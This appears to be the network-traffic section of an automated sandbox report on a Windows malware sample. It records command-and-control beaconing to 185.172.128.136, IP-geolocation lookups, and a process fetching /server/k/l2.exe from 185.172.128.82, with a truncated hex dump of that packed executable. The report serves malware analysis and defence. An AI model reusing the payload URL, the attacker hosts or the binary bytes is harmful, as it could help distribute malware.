                                                        May 23, 2024 23:34:47.871382952 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:48.077052116 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:48.173152924 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:51.130189896 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:51.135185003 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:51.346882105 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:51.442544937 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:54.380688906 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:54.385730982 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:54.596389055 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:54.739408016 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:56.238847017 CEST4973380192.168.2.4185.172.128.82
                                                        May 23, 2024 23:34:56.244545937 CEST8049733185.172.128.82192.168.2.4
                                                        May 23, 2024 23:34:57.630151987 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:34:57.635291100 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:57.843241930 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:34:57.942512989 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:00.880158901 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:00.886358976 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:01.091978073 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:01.239634991 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:04.145801067 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:04.150955915 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:04.362426043 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:04.442646027 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:07.399256945 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:07.404552937 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:07.606064081 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:07.739365101 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:10.667324066 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:10.676422119 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:10.872798920 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:11.036217928 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:14.011688948 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:14.016863108 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:14.215652943 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:14.442584038 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:17.302010059 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:17.307208061 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:17.500544071 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:17.629949093 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:20.552180052 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:20.561089993 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:20.768951893 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:20.942594051 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:23.817601919 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:23.843533039 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:24.043761015 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:24.109961987 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:27.098855019 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:27.107089996 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:27.310082912 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:27.442506075 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:30.349410057 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:30.360667944 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:30.559117079 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:30.621364117 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:33.614511013 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:33.636048079 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:33.841356039 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:33.942511082 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:36.879986048 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:36.887034893 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:37.092334032 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:37.243161917 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:40.146363020 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:40.154442072 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:40.357556105 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:40.468389034 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:43.411953926 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:43.417365074 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:43.622489929 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:43.833023071 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:46.676980972 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:46.681963921 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:46.886522055 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:46.942455053 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:49.926812887 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:49.931843042 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:50.138004065 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:50.254651070 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:53.195322037 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:53.201459885 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:53.412062883 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:53.630008936 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:56.458070040 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:56.463087082 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:56.672132969 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:56.739348888 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:59.708172083 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:35:59.713483095 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:35:59.925648928 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:00.036123991 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:02.958165884 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:03.015386105 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:03.172159910 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:03.332964897 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:06.208039045 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:06.219598055 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:06.422076941 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:06.484937906 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:09.458120108 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:09.468719959 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:09.669579029 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:09.741302967 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:12.723733902 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:12.733221054 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:12.933818102 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:13.129926920 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:15.038564920 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:15.038733959 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:15.132478952 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:15.132541895 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:15.134823084 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:18.067522049 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:18.100733995 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:18.303292036 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:18.442413092 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:21.348625898 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:21.354655981 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:21.562195063 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:21.739161015 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:24.600161076 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:24.623941898 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:24.826395035 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:24.942425013 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:27.879959106 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:27.885030031 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:28.091061115 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:28.241991043 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:31.129977942 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:31.144620895 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:31.343075037 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:31.385351896 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:34.395840883 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:34.629805088 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:34.945015907 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:35.088761091 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:35.088854074 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:35.088884115 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:35.259865046 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:35.377983093 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:38.286241055 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:38.306854963 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:38.519867897 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:38.645405054 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:41.567486048 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:41.578527927 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:41.799040079 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:41.918426991 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:44.848736048 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:44.853847027 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:45.091442108 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:45.145536900 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:48.129961967 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:48.142575026 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:48.341680050 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:48.442960978 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:51.398607969 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:51.455369949 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:51.618071079 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:51.702689886 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:54.661006927 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:54.845449924 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:55.031852961 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:55.129765034 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:58.067692041 CEST4973450500192.168.2.4185.172.128.136
                                                        May 23, 2024 23:36:58.078629971 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:58.291774035 CEST5050049734185.172.128.136192.168.2.4
                                                        May 23, 2024 23:36:58.442210913 CEST4973450500192.168.2.4185.172.128.136

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 23, 2024 23:33:01.368495941 CEST4991553192.168.2.41.1.1.1
                                                        May 23, 2024 23:33:01.392410994 CEST53499151.1.1.1192.168.2.4
                                                        May 23, 2024 23:33:02.203530073 CEST5128553192.168.2.41.1.1.1
                                                        May 23, 2024 23:33:02.255886078 CEST53512851.1.1.1192.168.2.4

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        May 23, 2024 23:33:01.368495941 CEST192.168.2.41.1.1.10xb641Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                        May 23, 2024 23:33:02.203530073 CEST192.168.2.41.1.1.10x7375Standard query (0)db-ip.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        May 23, 2024 23:33:01.392410994 CEST1.1.1.1192.168.2.40xb641No error (0)ipinfo.io34.117.186.192A (IP address)IN (0x0001)false
                                                        May 23, 2024 23:33:02.255886078 CEST1.1.1.1192.168.2.40x7375No error (0)db-ip.com104.26.4.15A (IP address)IN (0x0001)false
                                                        May 23, 2024 23:33:02.255886078 CEST1.1.1.1192.168.2.40x7375No error (0)db-ip.com172.67.75.166A (IP address)IN (0x0001)false
                                                        May 23, 2024 23:33:02.255886078 CEST1.1.1.1192.168.2.40x7375No error (0)db-ip.com104.26.5.15A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • https:
                                                          • ipinfo.io
                                                        • db-ip.com
                                                        • 185.172.128.82

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449733185.172.128.82804944C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        May 23, 2024 23:33:06.013114929 CEST224OUTHEAD /server/k/l2.exe HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                        Host: 185.172.128.82
                                                        Cache-Control: no-cache
                                                        May 23, 2024 23:33:06.679965019 CEST260INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 23 May 2024 21:33:06 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 4563640
                                                        Last-Modified: Wed, 22 May 2024 06:47:19 GMT
                                                        Connection: keep-alive
                                                        ETag: "664d94f7-45a2b8"
                                                        Accept-Ranges: bytes
                                                        May 23, 2024 23:33:06.681318045 CEST223OUTGET /server/k/l2.exe HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
                                                        Host: 185.172.128.82
                                                        Cache-Control: no-cache
                                                        May 23, 2024 23:33:06.925595045 CEST1236INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Thu, 23 May 2024 21:33:06 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 4563640
                                                        Last-Modified: Wed, 22 May 2024 06:47:19 GMT
                                                        Connection: keep-alive
                                                        ETag: "664d94f7-45a2b8"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: MZ@!L!Win32 .EXE.$@PELMa^w0@}mFww|EPw.MPRESS1pw?.MPRESS22w?.rsrc|w?@v2.19w? oG>Hr9aQ(`.=?!Z&II18Z!Ys[QXaYY)vn|)^f+>84h82g>*hb\E(x@8_94Um's#03O]`S2@#oF~*RQqoynOA@|gF0js/H+ 0C!7s^H, {DrI,|u6E>q}g)UME'j}7^wLekT`#%bnF&-o/8SE{1E,<
                                                        May 23, 2024 23:33:06.925616980 CEST1236INData Raw: 95 63 7c 62 14 7a 8b 46 7a 1a 01 b7 08 bd e8 11 11 7c 83 ee 57 22 70 03 15 e4 ed a2 17 31 ba 52 78 e6 fb b7 ba 6b 46 40 f9 62 4c 19 cf 0f 83 67 98 84 14 d6 a1 84 0d 70 e7 ad 96 18 5f 8e 2d 2d ee da 4b a9 1a ef fa 01 bb 89 f5 32 c4 d1 0b f5 7c e5
                                                        Data Ascii: c|bzFz|W"p1RxkF@bLgp_--K2|koN$Xkj+%R+t[ BS=)d;*l;._>KfBqxY(F|0.Ve%S61opMG`'\YfRXvY[R+t[
                                                        May 23, 2024 23:33:06.925935984 CEST448INData Raw: ea 8b a9 cb 03 bc 1e 0f a1 a7 4e 8a 54 6a 55 a2 2a 2f 6e 5e cb f1 f6 09 49 e4 0d c8 5c 63 28 b1 36 8f 8b b8 99 c3 4f 5c 69 f7 db 86 b0 64 07 52 2d 8c 8c 18 41 64 1b 7d 70 60 7d 5a e5 46 3d 11 d9 15 8c bf 42 63 52 cb d2 94 b8 50 61 63 c7 d7 94 fe
                                                        Data Ascii: NTjU*/n^I\c(6O\idR-Ad}p`}ZF=BcRPac~lVjP/&0[^EHRqW~;GE/(*PiuiU/bsZD_W5{6"f#83|)`zwE++i4y5b6=
                                                        May 23, 2024 23:33:06.927439928 CEST1236INData Raw: d2 56 1c f3 66 eb 3c 94 dc b5 48 e2 7b f7 a1 f5 49 a6 7b 46 b9 09 0d 4e b3 bc 67 e5 c9 3b 26 88 fa 0f 3d 5f 0b da 57 17 fb 4c 49 bd 9f db 07 5f 87 d6 06 4c c1 6b 9c c6 52 5e 1d de c7 cb c5 1d 25 8e 52 62 dc 0c 86 94 8e ef 94 bd 6b a3 26 8b a7 3a
                                                        Data Ascii: Vf<H{I{FNg;&=_WLI_LkR^%Rbk&:?s;[QT%mp}4Qdv#<6I[YA:e4WF1-]?Zx_bqI\6`~PaFp71"<Y^T
                                                        May 23, 2024 23:33:06.927455902 CEST1236INData Raw: 1f a3 82 f1 b9 6b 22 2c 2c 23 0d 8b 0d 20 96 99 a8 85 2f 02 61 96 ba c3 65 43 f5 f9 55 ba 5e 77 99 a9 10 6c 99 75 51 38 66 31 00 e4 d5 de 68 b3 d6 89 3b fd c5 4d 70 58 ad fe 13 44 71 d9 b6 89 60 41 55 b4 85 62 8e 3a 6e e0 b2 6e 1f 6a 3d 00 f9 84
                                                        Data Ascii: k",,# /aeCU^wluQ8f1h;MpXDq`AUb:nnj=yn^^Rj]p+oR#oFpd,Y5rIh?G0j|,]ultVgp7"L\j]n0zSi#[J3qAJ
                                                        May 23, 2024 23:33:06.927475929 CEST1236INData Raw: 83 34 45 3d 4c b7 22 03 34 59 72 c2 09 3f 67 c8 91 c4 6e 54 f2 47 6a 73 45 5c 15 5d 77 d6 ef ea 85 53 ef f8 57 8f b1 c5 5d 17 bf 5f 1c e3 97 62 7a a0 b5 d0 eb f1 64 9f a9 7a e1 d0 97 f0 c2 b6 fc b7 b1 45 c3 4f b2 4d 03 fd 8f 49 80 0d d0 83 f8 61
                                                        Data Ascii: 4E=L"4Yr?gnTGjsE\]wSW]_bzdzEOMIaRql%Szb%/_jhtMHZ'<Y%g;L_a>Qvxls(mi!jt!o~Vnj-@m[.|q+&+S5g/A)t+F3#Jr$
                                                        May 23, 2024 23:33:06.930449963 CEST1236INData Raw: f9 be 3e 6b 16 d5 ea e6 fb 15 1a 78 66 9b ed d1 58 a3 22 d2 02 75 4d 27 1b c8 12 a6 09 3f 4e c9 69 c9 a0 50 1f 15 a5 51 7b b1 3f 42 f9 73 2c 36 3d db 73 4c 7a a4 9b 17 5a 97 8b b0 28 48 c8 48 1f 85 60 d5 2e 4a a8 55 cd 5e 2f f0 b6 75 92 f3 e7 61
                                                        Data Ascii: >kxfX"uM'?NiPQ{?Bs,6=sLzZ(HH`.JU^/uaWcgoh-X4m;<0y8.pE2D>0*)3k?[1{n5QEM#L'&Qo2^q)' 1\@?\ns7j'U~,dA
                                                        May 23, 2024 23:33:06.931996107 CEST328INData Raw: aa 5f 50 1d a3 3f 74 ed f0 17 d6 d7 b6 54 21 6c 79 3b 09 77 78 f9 43 cf 20 a2 57 63 1b de ef 29 f5 8e 86 c7 cb 7b 26 a2 a4 49 ab d8 5f 00 75 6d 27 84 4d 8c f2 cd d7 65 45 d0 8b d9 6d f6 5e 1b 24 75 cd 70 00 d5 77 76 b1 53 5c 9d f6 50 49 24 03 c5
                                                        Data Ascii: _P?tT!ly;wxC Wc){&I_um'MeEm^$upwvS\PI$tKYk{Ql"9K8RoA4s-FhyAQXGL;~k^^F#d~)g0!EQ:(f4V^-?8X1K
                                                        May 23, 2024 23:33:06.932012081 CEST1236INData Raw: 4f 6c 17 e2 d6 96 4d 04 74 37 23 00 5b 1e d1 3f 69 1c 88 64 5d 26 5c e7 a6 31 84 49 8d 1c 72 55 2c 80 f6 a9 d3 69 8e f6 f2 e9 37 10 86 82 17 21 99 e7 56 50 85 01 7b 7f f7 5e 41 56 01 58 37 bd 7b 0e e7 64 4a 26 8f a6 1c 95 8d 63 8a a6 1a bf fc fd
                                                        Data Ascii: OlMt7#[?id]&\1IrU,i7!VP{^AVX7{dJ&c2!wXS%xq?+/<2RXw+po@K}|-=UqF@qhGZ#CWOg(w_NN)cd1$Xw\rQqi;
                                                        May 23, 2024 23:33:06.932025909 CEST1236INData Raw: 6e f8 fe 6c da 87 7d 1b 54 1a 99 72 25 b2 8c 0f 04 64 8d 12 81 7c 8e e1 ab 58 ae a1 63 32 e9 ff b6 ce 6f 05 73 75 08 07 e5 15 3a f8 c4 1e 66 0f 3f 6d fa c8 12 63 af 0a 2d 93 6c d7 db 82 31 41 6d 58 8c 2f 72 da 4c 1e ee 11 46 9c 16 0d cf 62 e0 07
                                                        Data Ascii: nl}Tr%d|Xc2osu:f?mc-l1AmX/rLFb7M;pGot/Y9{=~U8h<U\f-9q2M\{C|qV5P>J4~~EnZ6C.`0;t]NN=ozKg8&6
                                                        May 23, 2024 23:33:06.934997082 CEST1236INData Raw: 16 c9 87 15 ba 4e f2 e5 df 2a d0 09 6a 8e 2c 1a 98 ad fd d9 bd 7d 7c db db 36 09 1c 6c 80 74 2c 07 34 9c 56 28 28 53 a4 38 5f 29 62 d1 12 1e 9e b7 54 49 1f be 74 9f 00 3d 03 58 d9 0c 3c 71 2b 27 60 17 c3 39 f0 a3 89 c5 24 a4 95 c7 74 f1 1f a5 dd
                                                        Data Ascii: N*j,}|6lt,4V((S8_)bTIt=X<q+'`9$tWza8v;pS[u(Y}/P/DPC~F}!ZlOADq}}s# :%>5%G))e_HJ&UAZy%D)q


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44973134.117.186.1924434944C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-05-23 21:33:02 UTC237OUTGET /widget/demo/8.46.123.175 HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Referer: https://ipinfo.io/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                        Host: ipinfo.io
                                                        2024-05-23 21:33:02 UTC514INHTTP/1.1 200 OK
                                                        server: nginx/1.24.0
                                                        date: Thu, 23 May 2024 21:33:02 GMT
                                                        content-type: application/json; charset=utf-8
                                                        Content-Length: 1028
                                                        access-control-allow-origin: *
                                                        x-frame-options: SAMEORIGIN
                                                        x-xss-protection: 1; mode=block
                                                        x-content-type-options: nosniff
                                                        referrer-policy: strict-origin-when-cross-origin
                                                        x-envoy-upstream-service-time: 2
                                                        via: 1.1 google
                                                        strict-transport-security: max-age=2592000; includeSubDomains
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close
                                                        2024-05-23 21:33:02 UTC876INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76
                                                        Data Ascii: { "input": "8.46.123.175", "data": { "ip": "8.46.123.175", "hostname": "static-cpe-8-46-123-175.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Lev
